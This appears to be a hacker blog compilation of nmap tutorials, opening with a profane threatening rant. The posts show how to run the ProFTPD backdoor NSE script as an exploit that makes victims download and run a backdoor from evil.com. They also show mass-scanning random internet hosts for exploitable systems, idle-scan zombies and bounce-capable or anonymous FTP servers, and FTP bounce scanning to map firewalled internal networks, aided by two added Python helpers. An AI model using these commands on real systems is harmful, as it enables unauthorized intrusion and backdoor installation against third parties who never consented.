Troll Science for the WIN
One does not simply… Fuck with my plans…
One does not simply… Interfere everywhere…
One does not simply… Screw with my choices…
One does not simply… Make my choices for me…
One does not simply… Decide what is best for me…
One does not simply… Manufacture a future for me…
One does not simply… Assume they know what I need…
You know who you are.
You now know I know.
I know what you are planning.
And believe you me.
I will not fucking comply.
I know what I fucking want.
I know what I fucking need.
I know what my plan is.
Just because I do not share it.
Does not mean it does not exist.
Your opinion is now null.
Your view is now void.
Do not base data on an old set.
Learn to adapt and survive.
For if you fail to learn.
Not to try and interfere.
You will suddenly discover.
The consequences… Will be severe…
And finally, please remember.
Two can play at your game… And you know not what you are playing for…
Das Computermachine! See that antenna? Yeah. It does stuff.
Obligatory Mr Paranoid Duct Tape over webcam… And mic too for some reason…
Nmap is not limited to port scanning and host OS / service version detection and such; it also features an AWESOME scripting engine (the NSE, Nmap Scripting Engine) whose scripts are written in Lua. I hope to cover many “fun” uses of nmap’s scripting engine over the next while, though this post is going to be a bit… edgier and more “evil” in a sense. It is also VITALLY useful for those of you hunting down backdoored boxes!!
Every so often someone pops an open source project’s SVN, download server or mirror and backdoors the source code it ships. That source then finds its way onto potentially millions of systems, depending on when the breach is detected or the backdoor noticed. Sometimes someone writes an nmap script to scan for such compromised systems and, god forbid, even exploit them!
We will be showing off the following three scripts in this post, and using them as a primer for nmap’s scripts. (I will only give a usage demo of one; the other two work the same way and are left to the reader as an exercise.)
These scripts are intended to locate backdoored installations of ProFTPD, vsFTPd and UnrealIRCd, respectively.
For the example, we will use: “ftp-proftpd-backdoor.nse”
This script is intended to locate backdoored installations of ProFTPD 1.3.3c (OSVDB-ID 69562) and tests them by running the “id” command through the backdoor. Please note, this is regarded as a “remote root” vulnerability, since the backdoored daemon hands out a shell with proftpd’s privileges, and it was (and is) actively exploited in the wild.
root@bha:~# nmap --script ftp-proftpd-backdoor victim.tld
This simply tests for the vulnerability, using all defaults. Nothing too special, but VERY useful for quickly testing.
Using as an exploit!
This script takes an argument that lets you specify a custom command to run on the vulnerable system, which is VERY useful during a penetration test!
root@bha:~# nmap --script ftp-proftpd-backdoor --script-args ftp-proftpd-backdoor.cmd="wget http://evil.com/backdoor.pl && perl backdoor.pl" victim.tld
Please note the --script-args followed by the argument (in scriptname.arg=value format) giving the command to run; quote it so your own shell does not interpret the && before nmap ever sees it. In this example we have it forcing the vulnerable host to download and then run a backdoor. (Yes, another one. This time maybe a reverse shell, or a loader for something like Jynx Rootkit…).
Ok. Now for the real blackhats in the audience… Yes, you can scan ranges with this. Just replace victim.tld with your standard CIDR range specifier (198.51.100.0/24 and the like)… OR… for those who are less discriminate, -iR <count> with no target list at all will simply scan that many random IPs (-iR 0 means “never stop”). Further optimizations include -p21 (only port 21, which is all the script needs), -n (skip reverse DNS lookups), -T5 (insane timing) and -Pn (“don’t waste my time pinging!”, i.e. skip host discovery; older releases spelled it -P0 or -PN)…
The other two (ftp-vsftpd-backdoor and irc-unrealircd-backdoor) are similar. To get information on them (an exercise best left to the reader), the following may be of assistance:
root@bha:~# nmap --script-help ftp-proftpd-backdoor
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-16 00:41 IST
Categories: exploit intrusive malware vuln
Tests for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID 69562. This script attempts to exploit the backdoor using the innocuous <code>id</code> command by default, but that can be changed with the <code>ftp-proftpd-backdoor.cmd</code> script argument.
See? You can ask for help! Just pass the name of the script to nmap, and it will help you out using the nsedoc engine :)
Another challenge that I put out there for any aspiring evil geniuses: How about using all three scripts AT ONCE? Optimized? It CAN be done, and when I get back I will show how. Just for now… See below :P
Best regards, and a note: I likely will not be writing too much over the next couple of days, as I just turned 20 and plan on being rather hungover and TOTALLY useless for a day or so…
However, my other stuff is at http://insecurety.net/ and http://theinfodox.blogspot.com (migrating that to here…)…
Also, checking out http://blackhatacademy.org is an EXCELLENT idea!
So, having read my previous posts on Idle Scanning and FTP Bounce, you may be interested in finding useable boxes.
Now, as I suggested, you could scan for printers or other embedded devices; they make fucking AMAZING Idle Scan hosts (simple TCP/IP stacks with a plain incremental IP ID counter and very little traffic of their own). However, there is an nmap script which is excellent for checking whether a host is usable, by looking at how its IP ID sequence behaves.
ipidseq.nse is basically a test script that tells you if you can use a host for Idle Scans: it sends a handful of probes and classifies the IP ID sequence it gets back (incremental is what you want; randomized or all-zeros hosts are useless as zombies). So, assuming you want a fair few zombies, let’s scan 1000 hosts in the hope of finding a few good ones!
root@bha:~# nmap -iR 1000 --script ipidseq -T5 -v -oA zombies
The above scan will scan 1000 random IP addresses using the ipidseq script, testing them to see whether they are usable as zombies. I am using -T5 here as scanning ranges slowly is BORING :P (Bear in mind that -T5 can drop probes on slow links, and ipidseq only sends a few, so a host the script cannot classify may deserve a rescan at a saner speed.)
The -oA zombies will create three output files: zombies.xml (XML format of the scan), zombies.nmap (normal output) and zombies.gnmap (the “grepable” format). Note that the grepable format does not carry script output, so pull the usable hosts out of zombies.nmap or zombies.xml with grep/awk or similar, or just scroll through, copy, paste, like myself…
"So we found us some Zombies. What about those Bouncy FTP servers then?"
Well, nmap again has the solution to this problem. The ftp-bounce.nse script. We will use it in a very similar manner to the ipidseq script…
root@bha:~# nmap -iR 1000 --script ftp-bounce -T5 -v -oA bouncyFTP
This does the same as above, except instead it outputs lists of FTP servers we can “Bounce” via! Useful, no?
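Rather than scrolling through zombies.nmap and bouncyFTP.nmap by hand, here is an added example (mine, not code from the original post or from nmap) that reads the .xml file -oA also writes and pulls out the hosts you care about: every NSE result is in there as a <script id="..." output="..."> element, under <hostscript> for host scripts like ipidseq and under the relevant <port> for port scripts like ftp-bounce, ftp-anon or the backdoor checks from the previous post. The XML is a constructed sample, and the result strings it matches (“Incremental!”, “bounce working!”) are assumed to be what those scripts print; check them against your own output before trusting the filter.

```python
"""Triage "nmap -oA" output by NSE script result.

Added example, not code from the original post or from nmap. Reads the .xml
report rather than the .nmap text, because script output is structured there.
The XML below is a constructed sample; the matched result strings are assumed
to be what ipidseq / ftp-bounce print.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample: what "nmap -iR 4 --script ipidseq,ftp-bounce -oA out"
# might leave in out.xml, trimmed to the elements this parser looks at.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -iR 4 --script ipidseq,ftp-bounce -oA out" version="5.61TEST4">
<host><status state="up"/>
  <address addr="203.0.113.10" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="21"><state state="open"/><service name="ftp"/>
    <script id="ftp-bounce" output="bounce working!"/></port></ports>
  <hostscript><script id="ipidseq" output="Incremental!"/></hostscript>
</host>
<host><status state="up"/>
  <address addr="203.0.113.11" addrtype="ipv4"/>
  <address addr="00:11:22:33:44:55" addrtype="mac"/>
  <hostscript><script id="ipidseq" output="Broken little-endian incremental!"/></hostscript>
</host>
<host><status state="up"/>
  <address addr="198.51.100.7" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="2121"><state state="open"/><service name="ftp"/>
    <script id="ftp-bounce" output="server forbids bouncing to low ports &lt;1025"/></port></ports>
  <hostscript><script id="ipidseq" output="Randomized"/></hostscript>
</host>
<host><status state="up"/>
  <address addr="198.51.100.9" addrtype="ipv4"/>
  <hostscript><script id="ipidseq" output="Incremental!"/></hostscript>
</host>
</nmaprun>
"""


def script_results(root, script_id):
    """Yield (ip, port, output) for every <script id=script_id>; port is None for host scripts."""
    for host in root.iter("host"):
        ip = None
        for addr in host.findall("address"):
            if addr.get("addrtype") in ("ipv4", "ipv6"):
                ip = addr.get("addr")
        if ip is None:  # no usable address on this host, skip it
            continue
        for s in host.findall("hostscript/script"):
            if s.get("id") == script_id:
                yield ip, None, s.get("output", "")
        for port in host.findall("ports/port"):
            for s in port.findall("script"):
                if s.get("id") == script_id:
                    yield ip, int(port.get("portid")), s.get("output", "")


def hosts_matching(xml_text, script_id, pattern):
    """Sorted 'ip' or 'ip:port' strings whose output for script_id matches the regex."""
    root = ET.fromstring(xml_text)
    rx = re.compile(pattern)
    hits = set()
    for ip, port, out in script_results(root, script_id):
        if rx.search(out):
            hits.add(ip if port is None else f"{ip}:{port}")
    return sorted(hits)


def idle_scan_zombies(xml_text):
    # An incremental IP ID class is what -sI needs; nmap's idle scan also copes
    # with the byte-swapped "Broken little-endian incremental!" class, so keep
    # both. "Randomized" and "All zeros" hosts are useless as zombies.
    return hosts_matching(xml_text, "ipidseq", r"^(Broken little-endian )?[Ii]ncremental!$")


def bounce_hosts(xml_text):
    # Only servers that actually opened the data connection to the test port.
    return hosts_matching(xml_text, "ftp-bounce", r"^bounce working!$")


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    print("idle-scan zombies:", idle_scan_zombies(text))
    print("bounce-capable FTP:", bounce_hosts(text))
```

Run it as `python triage.py zombies.xml` (or bouncyFTP.xml); with no argument it runs over the built-in sample. The same hosts_matching() call works for any other script, e.g. hosts_matching(text, "ftp-anon", ".") lists every server that answered the anonymous-login check.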
BONUS ROUND! Finding Anonymous FTP Servers for stashin’ yo’ warez!
So. Say you want to store/share a bunch of files and need some storage, or just like rummaging through open FTP servers (likely in search of other people’s warez and such… Never know, might find someone’s super secret 0day stash!).
How do we go about doing such a thing? Well, Guess what? nmap, yet again, solves this problem with the ftp-anon script.
Now, as above, you simply use it like so…
root@bha:~# nmap --script ftp-anon -T5 -iR 1000 -v -oA ftpAnon
Remember - with these you can always scan actual *ranges* instead of my “scan 1000 random hosts” idea, and this is VERY useful for auditing internal networks! Or some specific target networks… I know some web hosting firms may be VERY interested in scanning their own ranges for anonymous FTP setups to detect illegal piracy and such!
Remember, ask before you scan!
In parts One and Two of this series I described various methods of evading IDS/IPS/firewalls, and general methods of evading detection when port scanning your targets with nmap.
In this instalment I hope to give an overview of the technique called the “FTP Bounce” Scan technique, and various “interesting” uses I have had for it…
This, along with my other nmap articles, is all kind of my notes for the wiki article over at http://blackhatacademy.org - reopening soon - with lots of shiny new content and awesome stuff!
So, how does FTP Bounce work?
Well, the File Transfer Protocol (RFC 959, as the nmap man page cites it) has a command called PORT. It exists for “proxy FTP”: the client tells the server which host and port to open the data connection to, so the server can deliver a file to a third party instead of back to the client. Obviously, in order to send a file to another host/port, the server has to CONNECT to that host/port first, and its reply to the transfer command tells you whether that connection succeeded or failed. So we can use this to get the FTP server to check whether a given host/port is open for us… Seeing what I am getting at here?
We can make an arbitrary FTP server port scan another host for us (IF said FTP server supports this “feature”… which, according to nmap’s man page, most modern servers no longer do, or only allow towards the connecting client’s own address… but still!).
Now, most of us are likely thinking “Right, so I can make random FTP servers act as “drones” during my port scans… AWESOME!”. Yes, yes you can. This puts another hop between you and your victim: the target sees connections coming from the FTP server, not from you, so it is a shitload harder to trace back (the FTP server itself still has your source address in its logs, mind, so choose your bounce host accordingly). Slow timing like -T0 is recommended here to make things even sneakier: the FTP server is not DESIGNED to be a port scanner, so one PORT plus LIST per target port is not exactly subtle, and we kind of have to rely on timing. Need I say this is TCP ports only? It is also slow, since every probed port costs a full round trip through the FTP server.
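To make the mechanism concrete, here is an added example (mine, not code from the original post or from nmap) of the exchange a bounce scan relies on, per target port: log in, send PORT aimed at the target, then send LIST so the server is forced to open the data connection there; the reply to LIST gives the port state away. FakeBounceServer is a constructed stand-in for a real server’s control connection (its handle() takes the place of send-and-read on a socket), and the reply codes it uses are the standard RFC 959 ones. The mapping of those codes to “open” / “closed” is my reading of how servers behave, and the anonymous credentials in bounce_scan() are the ones nmap’s man page says -b falls back to.

```python
"""The FTP bounce exchange, end to end.

Added example, not code from the original post or from nmap. FakeBounceServer
is a scripted stand-in for a real server; the reply codes are RFC 959's.
"""


def port_argument(ip: str, port: int) -> str:
    """Encode ip:port as RFC 959 PORT wants it: h1,h2,h3,h4,p1,p2 (port = p1*256 + p2)."""
    octets = ip.split(".")
    if len(octets) != 4 or not all(o.isdigit() and int(o) <= 255 for o in octets):
        raise ValueError("PORT needs a dotted-quad IPv4 address")
    if not 0 < port < 65536:
        raise ValueError("port out of range")
    return ",".join(octets + [str(port >> 8), str(port & 0xFF)])


def classify_list_reply(reply: str) -> str:
    """Turn the server's reply to LIST (sent right after our PORT) into a port state.

    425: the server could not open the data connection -> target port closed/filtered.
    150 (or 125/226 if the listing finished at once): the connection went through -> open.
    Anything else: the server would not play along, so no verdict on the target.
    """
    code = reply[:3]
    if code == "425":
        return "closed"
    if code in ("125", "150", "226"):
        return "open"
    return "bounce-refused"


class FakeBounceServer:
    """Scripted FTP server for this example: accepts anonymous login, honours
    PORT, and pretends its data connection only succeeds to ports in open_ports.
    With allow_low_ports=False it rejects PORT towards ports below 1024, as many
    hardened servers do (the ftp-bounce NSE script reports that case separately)."""

    def __init__(self, open_ports, allow_low_ports=True):
        self.open_ports = set(open_ports)
        self.allow_low_ports = allow_low_ports
        self.pending = None  # (ip, port) named by the last accepted PORT
        self.log = ["S: 220 example ftpd ready"]  # both sides of the conversation

    def handle(self, line: str) -> str:
        self.log.append("C: " + line)
        verb, _, arg = line.partition(" ")
        if verb == "USER":
            reply = "331 Please specify the password."
        elif verb == "PASS":
            reply = "230 Login successful."
        elif verb == "PORT":
            h = arg.split(",")
            ip, port = ".".join(h[:4]), int(h[4]) * 256 + int(h[5])
            if port < 1024 and not self.allow_low_ports:
                reply = "500 Illegal PORT command."
            else:
                self.pending = (ip, port)
                reply = "200 PORT command successful."
        elif verb == "LIST":
            if self.pending and self.pending[1] in self.open_ports:
                reply = "150 Here comes the directory listing."
            else:
                reply = "425 Can't build data connection."
            self.pending = None
        else:
            reply = "502 Command not implemented."
        self.log.append("S: " + reply)
        return reply


def bounce_scan(send_cmd, target_ip, ports, user="anonymous", password="-wwwuser@"):
    """Drive the bounce exchange for each target port; returns {port: state}.

    send_cmd(line) sends one control-connection command and returns the reply
    line; against a real server wrap a socket the same way. The default
    credentials are the anonymous pair nmap's -b uses when given no user:pass.
    """
    reply = send_cmd(f"USER {user}")
    if reply.startswith("331"):
        reply = send_cmd(f"PASS {password}")
    if not reply.startswith("230"):
        raise RuntimeError(f"login failed: {reply}")
    results = {}
    for port in ports:
        if not send_cmd("PORT " + port_argument(target_ip, port)).startswith("200"):
            results[port] = "bounce-refused"  # server will not aim its data connection there
            continue
        results[port] = classify_list_reply(send_cmd("LIST"))
    return results


if __name__ == "__main__":
    srv = FakeBounceServer(open_ports={22, 80})
    print(bounce_scan(srv.handle, "10.0.0.5", [22, 23, 80]))
    print("\n".join(srv.log))  # the full conversation, client and server lines
```

Two things worth noticing in the transcript it prints: the target never appears on your own wire except inside the PORT argument, and a server that answers 500 to PORT for low ports will still happily bounce to everything above 1024, which is exactly the distinction the ftp-bounce script draws when you check a server beforehand.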
Now for the super fun part. Now the following idea, I thought was fairly original when I came up with it while walking my dog. However, upon reading the man pages for nmap (and you wondered why I was sleep deprived? I STILL AM!) I realized Fyodor had gotten there first. Years ago. Feck.
However, it is still a cool trick… So I will outline it.
Say you are scanning company.tld, and have found a FTP server on their network, but the rest of the bloody network is firewalled off. You wish to scan the inside of their network. So, you somehow have gained credentials to their FTP server (or it supports anonymous logins), and you are still wondering how to use this to scan out the insides.
Use the external FTP server as your bounce host and ask it to scan the usual private ranges (10.x, 172.16-31.x, 192.168.x) until you figure out which addressing scheme they use. Then ask it to scan the whole bloody network for you! The FTP server sits inside their perimeter, so its data connections to internal hosts never cross the firewall that blocked you. Now you have mapped out their internal network simply by leveraging the FTP Bounce bug in their FTP server! Awesome, no?
Using FTP Bounce (assuming you have a vulnerable FTP server that allows this; see the ftp-bounce NSE script for checking FTP servers…)
root@bha:~# nmap -T0 -b username:password@ftpserver.tld:21 victim.tld
This uses the username “username”, the password “password”, the FTP server “ftpserver.tld” and port 21 on said server to scan victim.tld.
If the FTP server supports anonymous logins, just omit the username:password@ part and nmap will log in anonymously (per its man page it uses the user “anonymous” with the password “-wwwuser@”). You may omit :21 if the FTP port is 21; however, some people configure FTP on weird ports as an attempt at “security”.
So, thought up of any “fun” uses for the FTP bounce scan technique? Tell us about them! And keep an eye out for the finished Wiki article over at http://blackhatacademy.org (if I ever finish it, that is :P )
IF you want to see more of my work - http://insecurety.net or here. I occasionally update Insecurety when the fancy takes me to lovingly hand craft some HTML from my template, but, that depends. That is kind of why I have this…